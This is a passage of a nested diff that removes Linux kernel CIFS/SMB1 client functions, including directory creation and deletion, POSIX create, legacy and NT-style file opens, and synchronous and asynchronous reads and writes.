+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in RMFile = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto DelFileRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	DELETE_DIRECTORY_REQ *pSMB = NULL;
+-	DELETE_DIRECTORY_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBRmDir\n");
+-RmDirRetry:
+-	rc = smb_init(SMB_COM_DELETE_DIRECTORY, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->DirName, name);
+-	}
+-
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_rmdirs);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in RMDir = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto RmDirRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSSMBMkDir(const unsigned int xid, struct inode *inode, umode_t mode,
+-	     struct cifs_tcon *tcon, const char *name,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	CREATE_DIRECTORY_REQ *pSMB = NULL;
+-	CREATE_DIRECTORY_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSSMBMkDir\n");
+-MkDirRetry:
+-	rc = smb_init(SMB_COM_CREATE_DIRECTORY, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->DirName, name);
+-	}
+-
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
+-	pSMB->ByteCount = cpu_to_le16(name_len + 1);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_mkdirs);
+-	if (rc)
+-		cifs_dbg(FYI, "Error in Mkdir = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto MkDirRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
+-		__u32 posix_flags, __u64 mode, __u16 *netfid,
+-		FILE_UNIX_BASIC_INFO *pRetData, __u32 *pOplock,
+-		const char *name, const struct nls_table *nls_codepage,
+-		int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	OPEN_PSX_REQ *pdata;
+-	OPEN_PSX_RSP *psx_rsp;
+-
+-	cifs_dbg(FYI, "In POSIX Create\n");
+-PsxCreat:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, name);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(OPEN_PSX_REQ);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);	/* large enough */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	pdata = (OPEN_PSX_REQ *)((char *)(pSMB) + offset + 4);
+-	pdata->Level = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pdata->Permissions = cpu_to_le64(mode);
+-	pdata->PosixOpenFlags = cpu_to_le32(posix_flags);
+-	pdata->OpenFlags =  cpu_to_le32(*pOplock);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_OPEN);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Posix create returned %d\n", rc);
+-		goto psx_create_err;
+-	}
+-
+-	cifs_dbg(FYI, "copying inode info\n");
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-	if (rc || get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)) {
+-		rc = -EIO;	/* bad smb */
+-		goto psx_create_err;
+-	}
+-
+-	/* copy return information to pRetData */
+-	psx_rsp = (OPEN_PSX_RSP *)((char *) &pSMBr->hdr.Protocol
+-			+ le16_to_cpu(pSMBr->t2.DataOffset));
+-
+-	*pOplock = le16_to_cpu(psx_rsp->OplockFlags);
+-	if (netfid)
+-		*netfid = psx_rsp->Fid;   /* cifs fid stays in le */
+-	/* Let caller know file was created so we can set the mode. */
+-	/* Do we care about the CreateAction in any other cases? */
+-	if (cpu_to_le32(FILE_CREATE) == psx_rsp->CreateAction)
+-		*pOplock |= CIFS_CREATE_ACTION;
+-	/* check to make sure response data is there */
+-	if (psx_rsp->ReturnedLevel != cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC)) {
+-		pRetData->Type = cpu_to_le32(-1); /* unknown */
+-		cifs_dbg(NOISY, "unknown type\n");
+-	} else {
+-		if (get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)
+-					+ sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Open response data too small\n");
+-			pRetData->Type = cpu_to_le32(-1);
+-			goto psx_create_err;
+-		}
+-		memcpy((char *) pRetData,
+-			(char *)psx_rsp + sizeof(OPEN_PSX_RSP),
+-			sizeof(FILE_UNIX_BASIC_INFO));
+-	}
+-
+-psx_create_err:
+-	cifs_buf_release(pSMB);
+-
+-	if (posix_flags & SMB_O_DIRECTORY)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixmkdirs);
+-	else
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixopens);
+-
+-	if (rc == -EAGAIN)
+-		goto PsxCreat;
+-
+-	return rc;
+-}
+-
+-static __u16 convert_disposition(int disposition)
+-{
+-	__u16 ofun = 0;
+-
+-	switch (disposition) {
+-		case FILE_SUPERSEDE:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
+-			break;
+-		case FILE_OPEN:
+-			ofun = SMBOPEN_OAPPEND;
+-			break;
+-		case FILE_CREATE:
+-			ofun = SMBOPEN_OCREATE;
+-			break;
+-		case FILE_OPEN_IF:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OAPPEND;
+-			break;
+-		case FILE_OVERWRITE:
+-			ofun = SMBOPEN_OTRUNC;
+-			break;
+-		case FILE_OVERWRITE_IF:
+-			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
+-			break;
+-		default:
+-			cifs_dbg(FYI, "unknown disposition %d\n", disposition);
+-			ofun =  SMBOPEN_OAPPEND; /* regular open */
+-	}
+-	return ofun;
+-}
+-
+-static int
+-access_flags_to_smbopen_mode(const int access_flags)
+-{
+-	int masked_flags = access_flags & (GENERIC_READ | GENERIC_WRITE);
+-
+-	if (masked_flags == GENERIC_READ)
+-		return SMBOPEN_READ;
+-	else if (masked_flags == GENERIC_WRITE)
+-		return SMBOPEN_WRITE;
+-
+-	/* just go for read/write */
+-	return SMBOPEN_READWRITE;
+-}
+-
+-int
+-SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *fileName, const int openDisposition,
+-	    const int access_flags, const int create_options, __u16 *netfid,
+-	    int *pOplock, FILE_ALL_INFO *pfile_info,
+-	    const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc;
+-	OPENX_REQ *pSMB = NULL;
+-	OPENX_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 count;
+-
+-OldOpenRetry:
+-	rc = smb_init(SMB_COM_OPEN_ANDX, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->AndXCommand = 0xFF;       /* none */
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		count = 1;      /* account for one byte pad to word boundary */
+-		name_len =
+-		   cifsConvertToUTF16((__le16 *) (pSMB->fileName + 1),
+-				      fileName, PATH_MAX, nls_codepage, remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		count = 0;      /* no pad */
+-		name_len = copy_path_name(pSMB->fileName, fileName);
+-	}
+-	if (*pOplock & REQ_OPLOCK)
+-		pSMB->OpenFlags = cpu_to_le16(REQ_OPLOCK);
+-	else if (*pOplock & REQ_BATCHOPLOCK)
+-		pSMB->OpenFlags = cpu_to_le16(REQ_BATCHOPLOCK);
+-
+-	pSMB->OpenFlags |= cpu_to_le16(REQ_MORE_INFO);
+-	pSMB->Mode = cpu_to_le16(access_flags_to_smbopen_mode(access_flags));
+-	pSMB->Mode |= cpu_to_le16(0x40); /* deny none */
+-	/* set file as system file if special file such
+-	   as fifo and server expecting SFU style and
+-	   no Unix extensions */
+-
+-	if (create_options & CREATE_OPTION_SPECIAL)
+-		pSMB->FileAttributes = cpu_to_le16(ATTR_SYSTEM);
+-	else /* BB FIXME BB */
+-		pSMB->FileAttributes = cpu_to_le16(0/*ATTR_NORMAL*/);
+-
+-	if (create_options & CREATE_OPTION_READONLY)
+-		pSMB->FileAttributes |= cpu_to_le16(ATTR_READONLY);
+-
+-	/* BB FIXME BB */
+-/*	pSMB->CreateOptions = cpu_to_le32(create_options &
+-						 CREATE_OPTIONS_MASK); */
+-	/* BB FIXME END BB */
+-
+-	pSMB->Sattr = cpu_to_le16(ATTR_HIDDEN | ATTR_SYSTEM | ATTR_DIRECTORY);
+-	pSMB->OpenFunction = cpu_to_le16(convert_disposition(openDisposition));
+-	count += name_len;
+-	inc_rfc1001_len(pSMB, count);
+-
+-	pSMB->ByteCount = cpu_to_le16(count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *)pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
+-	if (rc) {
+-		cifs_dbg(FYI, "Error in Open = %d\n", rc);
+-	} else {
+-	/* BB verify if wct == 15 */
+-
+-/*		*pOplock = pSMBr->OplockLevel; */ /* BB take from action field*/
+-
+-		*netfid = pSMBr->Fid;   /* cifs fid stays in le */
+-		/* Let caller know file was created so we can set the mode. */
+-		/* Do we care about the CreateAction in any other cases? */
+-	/* BB FIXME BB */
+-/*		if (cpu_to_le32(FILE_CREATE) == pSMBr->CreateAction)
+-			*pOplock |= CIFS_CREATE_ACTION; */
+-	/* BB FIXME END */
+-
+-		if (pfile_info) {
+-			pfile_info->CreationTime = 0; /* BB convert CreateTime*/
+-			pfile_info->LastAccessTime = 0; /* BB fixme */
+-			pfile_info->LastWriteTime = 0; /* BB fixme */
+-			pfile_info->ChangeTime = 0;  /* BB fixme */
+-			pfile_info->Attributes =
+-				cpu_to_le32(le16_to_cpu(pSMBr->FileAttributes));
+-			/* the file_info buf is endian converted by caller */
+-			pfile_info->AllocationSize =
+-				cpu_to_le64(le32_to_cpu(pSMBr->EndOfFile));
+-			pfile_info->EndOfFile = pfile_info->AllocationSize;
+-			pfile_info->NumberOfLinks = cpu_to_le32(1);
+-			pfile_info->DeletePending = 0;
+-		}
+-	}
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto OldOpenRetry;
+-	return rc;
+-}
+-
+-int
+-CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms, int *oplock,
+-	  FILE_ALL_INFO *buf)
+-{
+-	int rc;
+-	OPEN_REQ *req = NULL;
+-	OPEN_RSP *rsp = NULL;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 count;
+-	struct cifs_sb_info *cifs_sb = oparms->cifs_sb;
+-	struct cifs_tcon *tcon = oparms->tcon;
+-	int remap = cifs_remap(cifs_sb);
+-	const struct nls_table *nls = cifs_sb->local_nls;
+-	int create_options = oparms->create_options;
+-	int desired_access = oparms->desired_access;
+-	int disposition = oparms->disposition;
+-	const char *path = oparms->path;
+-
+-openRetry:
+-	rc = smb_init(SMB_COM_NT_CREATE_ANDX, 24, tcon, (void **)&req,
+-		      (void **)&rsp);
+-	if (rc)
+-		return rc;
+-
+-	/* no commands go after this */
+-	req->AndXCommand = 0xFF;
+-
+-	if (req->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		/* account for one byte pad to word boundary */
+-		count = 1;
+-		name_len = cifsConvertToUTF16((__le16 *)(req->fileName + 1),
+-					      path, PATH_MAX, nls, remap);
+-		/* trailing null */
+-		name_len++;
+-		name_len *= 2;
+-		req->NameLength = cpu_to_le16(name_len);
+-	} else {
+-		/* BB improve check for buffer overruns BB */
+-		/* no pad */
+-		count = 0;
+-		name_len = copy_path_name(req->fileName, path);
+-		req->NameLength = cpu_to_le16(name_len);
+-	}
+-
+-	if (*oplock & REQ_OPLOCK)
+-		req->OpenFlags = cpu_to_le32(REQ_OPLOCK);
+-	else if (*oplock & REQ_BATCHOPLOCK)
+-		req->OpenFlags = cpu_to_le32(REQ_BATCHOPLOCK);
+-
+-	req->DesiredAccess = cpu_to_le32(desired_access);
+-	req->AllocationSize = 0;
+-
+-	/*
+-	 * Set file as system file if special file such as fifo and server
+-	 * expecting SFU style and no Unix extensions.
+-	 */
+-	if (create_options & CREATE_OPTION_SPECIAL)
+-		req->FileAttributes = cpu_to_le32(ATTR_SYSTEM);
+-	else
+-		req->FileAttributes = cpu_to_le32(ATTR_NORMAL);
+-
+-	/*
+-	 * XP does not handle ATTR_POSIX_SEMANTICS but it helps speed up case
+-	 * sensitive checks for other servers such as Samba.
+-	 */
+-	if (tcon->ses->capabilities & CAP_UNIX)
+-		req->FileAttributes |= cpu_to_le32(ATTR_POSIX_SEMANTICS);
+-
+-	if (create_options & CREATE_OPTION_READONLY)
+-		req->FileAttributes |= cpu_to_le32(ATTR_READONLY);
+-
+-	req->ShareAccess = cpu_to_le32(FILE_SHARE_ALL);
+-	req->CreateDisposition = cpu_to_le32(disposition);
+-	req->CreateOptions = cpu_to_le32(create_options & CREATE_OPTIONS_MASK);
+-
+-	/* BB Expirement with various impersonation levels and verify */
+-	req->ImpersonationLevel = cpu_to_le32(SECURITY_IMPERSONATION);
+-	req->SecurityFlags = SECURITY_CONTEXT_TRACKING|SECURITY_EFFECTIVE_ONLY;
+-
+-	count += name_len;
+-	inc_rfc1001_len(req, count);
+-
+-	req->ByteCount = cpu_to_le16(count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *)req,
+-			 (struct smb_hdr *)rsp, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
+-	if (rc) {
+-		cifs_dbg(FYI, "Error in Open = %d\n", rc);
+-		cifs_buf_release(req);
+-		if (rc == -EAGAIN)
+-			goto openRetry;
+-		return rc;
+-	}
+-
+-	/* 1 byte no need to le_to_cpu */
+-	*oplock = rsp->OplockLevel;
+-	/* cifs fid stays in le */
+-	oparms->fid->netfid = rsp->Fid;
+-	oparms->fid->access = desired_access;
+-
+-	/* Let caller know file was created so we can set the mode. */
+-	/* Do we care about the CreateAction in any other cases? */
+-	if (cpu_to_le32(FILE_CREATE) == rsp->CreateAction)
+-		*oplock |= CIFS_CREATE_ACTION;
+-
+-	if (buf) {
+-		/* copy from CreationTime to Attributes */
+-		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
+-		/* the file_info buf is endian converted by caller */
+-		buf->AllocationSize = rsp->AllocationSize;
+-		buf->EndOfFile = rsp->EndOfFile;
+-		buf->NumberOfLinks = cpu_to_le32(1);
+-		buf->DeletePending = 0;
+-	}
+-
+-	cifs_buf_release(req);
+-	return rc;
+-}
+-
+-static void
+-cifs_readv_callback(struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 2,
+-				 .rq_pages = rdata->pages,
+-				 .rq_offset = rdata->page_offset,
+-				 .rq_npages = rdata->nr_pages,
+-				 .rq_pagesz = rdata->pagesz,
+-				 .rq_tailsz = rdata->tailsz };
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
+-		 __func__, mid->mid, mid->mid_state, rdata->result,
+-		 rdata->bytes);
+-
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		/* result already set, check signature */
+-		if (server->sign) {
+-			int rc = 0;
+-
+-			rc = cifs_verify_signature(&rqst, server,
+-						  mid->sequence_number);
+-			if (rc)
+-				cifs_dbg(VFS, "SMB signature verification returned error = %d\n",
+-					 rc);
+-		}
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	case MID_REQUEST_SUBMITTED:
+-	case MID_RETRY_NEEDED:
+-		rdata->result = -EAGAIN;
+-		if (server->sign && rdata->got_bytes)
+-			/* reset bytes number since we can not check a sign */
+-			rdata->got_bytes = 0;
+-		/* FIXME: should this be counted toward the initiating task? */
+-		task_io_account_read(rdata->got_bytes);
+-		cifs_stats_bytes_read(tcon, rdata->got_bytes);
+-		break;
+-	default:
+-		rdata->result = -EIO;
+-	}
+-
+-	queue_work(cifsiod_wq, &rdata->work);
+-	release_mid(mid);
+-	add_credits(server, &credits, 0);
+-}
+-
+-/* cifs_async_readv - send an async write, and set up mid to handle result */
+-int
+-cifs_async_readv(struct cifs_readdata *rdata)
+-{
+-	int rc;
+-	READ_REQ *smb = NULL;
+-	int wct;
+-	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+-	struct smb_rqst rqst = { .rq_iov = rdata->iov,
+-				 .rq_nvec = 2 };
+-
+-	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+-		 __func__, rdata->offset, rdata->bytes);
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 12;
+-	else {
+-		wct = 10; /* old style read */
+-		if ((rdata->offset >> 32) > 0)  {
+-			/* can not handle this big offset for old */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **)&smb);
+-	if (rc)
+-		return rc;
+-
+-	smb->hdr.Pid = cpu_to_le16((__u16)rdata->pid);
+-	smb->hdr.PidHigh = cpu_to_le16((__u16)(rdata->pid >> 16));
+-
+-	smb->AndXCommand = 0xFF;	/* none */
+-	smb->Fid = rdata->cfile->fid.netfid;
+-	smb->OffsetLow = cpu_to_le32(rdata->offset & 0xFFFFFFFF);
+-	if (wct == 12)
+-		smb->OffsetHigh = cpu_to_le32(rdata->offset >> 32);
+-	smb->Remaining = 0;
+-	smb->MaxCount = cpu_to_le16(rdata->bytes & 0xFFFF);
+-	smb->MaxCountHigh = cpu_to_le32(rdata->bytes >> 16);
+-	if (wct == 12)
+-		smb->ByteCount = 0;
+-	else {
+-		/* old style read */
+-		struct smb_com_readx_req *smbr =
+-			(struct smb_com_readx_req *)smb;
+-		smbr->ByteCount = 0;
+-	}
+-
+-	/* 4 for RFC1001 length + 1 for BCC */
+-	rdata->iov[0].iov_base = smb;
+-	rdata->iov[0].iov_len = 4;
+-	rdata->iov[1].iov_base = (char *)smb + 4;
+-	rdata->iov[1].iov_len = get_rfc1002_length(smb);
+-
+-	kref_get(&rdata->refcount);
+-	rc = cifs_call_async(tcon->ses->server, &rqst, cifs_readv_receive,
+-			     cifs_readv_callback, NULL, rdata, 0, NULL);
+-
+-	if (rc == 0)
+-		cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
+-	else
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-
+-	cifs_small_buf_release(smb);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	    unsigned int *nbytes, char **buf, int *pbuf_type)
+-{
+-	int rc = -EACCES;
+-	READ_REQ *pSMB = NULL;
+-	READ_RSP *pSMBr = NULL;
+-	char *pReadData = NULL;
+-	int wct;
+-	int resp_buf_type = 0;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-
+-	cifs_dbg(FYI, "Reading %d bytes on fid %d\n", count, netfid);
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 12;
+-	else {
+-		wct = 10; /* old style read */
+-		if ((offset >> 32) > 0)  {
+-			/* can not handle this big offset for old */
+-			return -EIO;
+-		}
+-	}
+-
+-	*nbytes = 0;
+-	rc = small_smb_init(SMB_COM_READ_ANDX, wct, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;       /* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 12)
+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-
+-	pSMB->Remaining = 0;
+-	pSMB->MaxCount = cpu_to_le16(count & 0xFFFF);
+-	pSMB->MaxCountHigh = cpu_to_le32(count >> 16);
+-	if (wct == 12)
+-		pSMB->ByteCount = 0;  /* no need to do le conversion since 0 */
+-	else {
+-		/* old style read */
+-		struct smb_com_readx_req *pSMBW =
+-			(struct smb_com_readx_req *)pSMB;
+-		pSMBW->ByteCount = 0;
+-	}
+-
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-	rc = SendReceive2(xid, tcon->ses, iov, 1, &resp_buf_type,
+-			  CIFS_LOG_ERROR, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_reads);
+-	pSMBr = (READ_RSP *)rsp_iov.iov_base;
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in read = %d\n", rc);
+-	} else {
+-		int data_length = le16_to_cpu(pSMBr->DataLengthHigh);
+-		data_length = data_length << 16;
+-		data_length += le16_to_cpu(pSMBr->DataLength);
+-		*nbytes = data_length;
+-
+-		/*check that DataLength would not go beyond end of SMB */
+-		if ((data_length > CIFSMaxBufSize)
+-				|| (data_length > count)) {
+-			cifs_dbg(FYI, "bad length %d for count %d\n",
+-				 data_length, count);
+-			rc = -EIO;
+-			*nbytes = 0;
+-		} else {
+-			pReadData = (char *) (&pSMBr->hdr.Protocol) +
+-					le16_to_cpu(pSMBr->DataOffset);
+-/*			if (rc = copy_to_user(buf, pReadData, data_length)) {
+-				cifs_dbg(VFS, "Faulting on read rc = %d\n",rc);
+-				rc = -EFAULT;
+-			}*/ /* can not use copy_to_user when using page cache*/
+-			if (*buf)
+-				memcpy(*buf, pReadData, data_length);
+-		}
+-	}
+-
+-	if (*buf) {
+-		free_rsp_buf(resp_buf_type, rsp_iov.iov_base);
+-	} else if (resp_buf_type != CIFS_NO_BUFFER) {
+-		/* return buffer to caller to free */
+-		*buf = rsp_iov.iov_base;
+-		if (resp_buf_type == CIFS_SMALL_BUFFER)
+-			*pbuf_type = CIFS_SMALL_BUFFER;
+-		else if (resp_buf_type == CIFS_LARGE_BUFFER)
+-			*pbuf_type = CIFS_LARGE_BUFFER;
+-	} /* else no valid buffer on return - leave as null */
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-	return rc;
+-}
+-
+-
+-int
+-CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
+-	     unsigned int *nbytes, const char *buf)
+-{
+-	int rc = -EACCES;
+-	WRITE_REQ *pSMB = NULL;
+-	WRITE_RSP *pSMBr = NULL;
+-	int bytes_returned, wct;
+-	__u32 bytes_sent;
+-	__u16 byte_count;
+-	__u32 pid = io_parms->pid;
+-	__u16 netfid = io_parms->netfid;
+-	__u64 offset = io_parms->offset;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-	unsigned int count = io_parms->length;
+-
+-	*nbytes = 0;
+-
+-	/* cifs_dbg(FYI, "write at %lld %d bytes\n", offset, count);*/
+-	if (tcon->ses == NULL)
+-		return -ECONNABORTED;
+-
+-	if (tcon->ses->capabilities & CAP_LARGE_FILES)
+-		wct = 14;
+-	else {
+-		wct = 12;
+-		if ((offset >> 32) > 0) {
+-			/* can not handle big offset for old srv */
+-			return -EIO;
+-		}
+-	}
+-
+-	rc = smb_init(SMB_COM_WRITE_ANDX, wct, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid >> 16));
+-
+-	/* tcon and ses pointer are checked in smb_init */
+-	if (tcon->ses->server == NULL)
+-		return -ECONNABORTED;
+-
+-	pSMB->AndXCommand = 0xFF;	/* none */
+-	pSMB->Fid = netfid;
+-	pSMB->OffsetLow = cpu_to_le32(offset & 0xFFFFFFFF);
+-	if (wct == 14)
+-		pSMB->OffsetHigh = cpu_to_le32(offset >> 32);
+-
+-	pSMB->Reserved = 0xFFFFFFFF;
+-	pSMB->WriteMode = 0;
+-	pSMB->Remaining = 0;
+-
+-	/* Can increase buffer size if buffer is big enough in some cases ie we
+-	can send more if LARGE_WRITE_X capability returned by the server and if
+-	our buffer is big enough or if we convert to iovecs on socket writes
+-	and eliminate the copy to the CIFS buffer */
+-	if (tcon->ses->capabilities & CAP_LARGE_WRITE_X) {
+-		bytes_sent = min_t(const unsigned int, CIFSMaxBufSize, count);
+-	} else {
+-		bytes_sent = (tcon->ses->server->maxBuf - MAX_CIFS_HDR_SIZE)
+-			 & ~0xFF;
+-	}
+-
+-	if (bytes_sent > count)
+-		bytes_sent = count;
+-	pSMB->DataOffset =
+-		cpu_to_le16(offsetof(struct smb_com_write_req, Data) - 4);
+-	if (buf)
+-		memcpy(pSMB->Data, buf, bytes_sent);
+-	else if (count != 0) {
+-		/* No buffer */
+-		cifs_buf_release(pSMB);
+-		return -EINVAL;
+-	} /* else setting file size with write of zero bytes */
+-	if (wct == 14)
+-		byte_count = bytes_sent + 1; /* pad */
+-	else /* wct == 12 */
+-		byte_count = bytes_sent + 5; /* bigger pad, smaller smb hdr */
+-
